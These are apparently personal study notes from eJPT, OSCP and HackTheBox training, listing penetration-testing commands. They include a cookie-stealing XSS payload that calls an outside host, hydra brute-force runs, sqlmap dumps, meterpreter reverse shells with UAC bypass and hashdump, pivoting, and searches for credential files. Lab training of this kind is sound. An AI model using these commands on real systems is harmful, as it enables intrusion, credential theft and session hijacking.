Notes on the different commands / information received during my training for the eJPT, OSCP, and during CTFs / boxes on HackTheBox.
nmap -sn ip/24 -oN discovery.nmap
cat discovery.nmap | grep "for" | cut -d " " -f 5 > ips.txt
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
add -O to detect the OS
gobuster -u 'url' -w /path/to/dir-list-med.txt
-U user
-P pass
connect
> mysql -u user -pPASS -h mysql_server --port=
list databases
> show databases;
> use database_name;
list tables
> show tables;
see the contents of a table
> SELECT * FROM accounts
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
--> xp_cmdshell is Enabled
--> remote access is Enabled
use exploit/windows/mssql/mssql_payload
<script>new Image().src="http://192.168.99.11/get.php?a="+document.cookie;</script>
test for sqli with sqlmap
> sqlmap -u 'website/?id='
see tables
> sqlmap -u 'website' --tables
dump tables
> sqlmap -u 'website/?id=vuln' --dump -T table_name
SSH
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ssh://ip -v -I
FTP
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ftp://ip -v -I
TELNET
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt telnet://ip -v -I
john file_to_crack
search XXX
use XXX
show payload
show options
set payload windows or linux/meterpreter/reverse_tcp
background = backgrounds the current session
sessions -l
sessions -i X
getuid
getsystem
--> if it fails
background
search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit
getuid
getsystem
shell
search -f file_to_find
hashdump (then johntheripper to crack)
to use id_rsa.pub
create ~/.ssh/id_rsa.pub
ssh -i ~/.ssh/id_rsa.pub user@ip
give pass
perl enum4linux -a <ip>
<20> --> file sharing service is present, carry on
smbclient -L //<ip> -N
connect without a password
smbclient //<ip>/SHARE_NAME -N
ip route add subnet/24 via <ip>
1) background meterpreter session
2) use post/multi/manage/autoroute
3) set SESSION 1
4) set SUBNET 172.16.50.0
5) set CMD add
6) run
cd /
dir /s /b passwords.txt
dir /s /b credentials.txt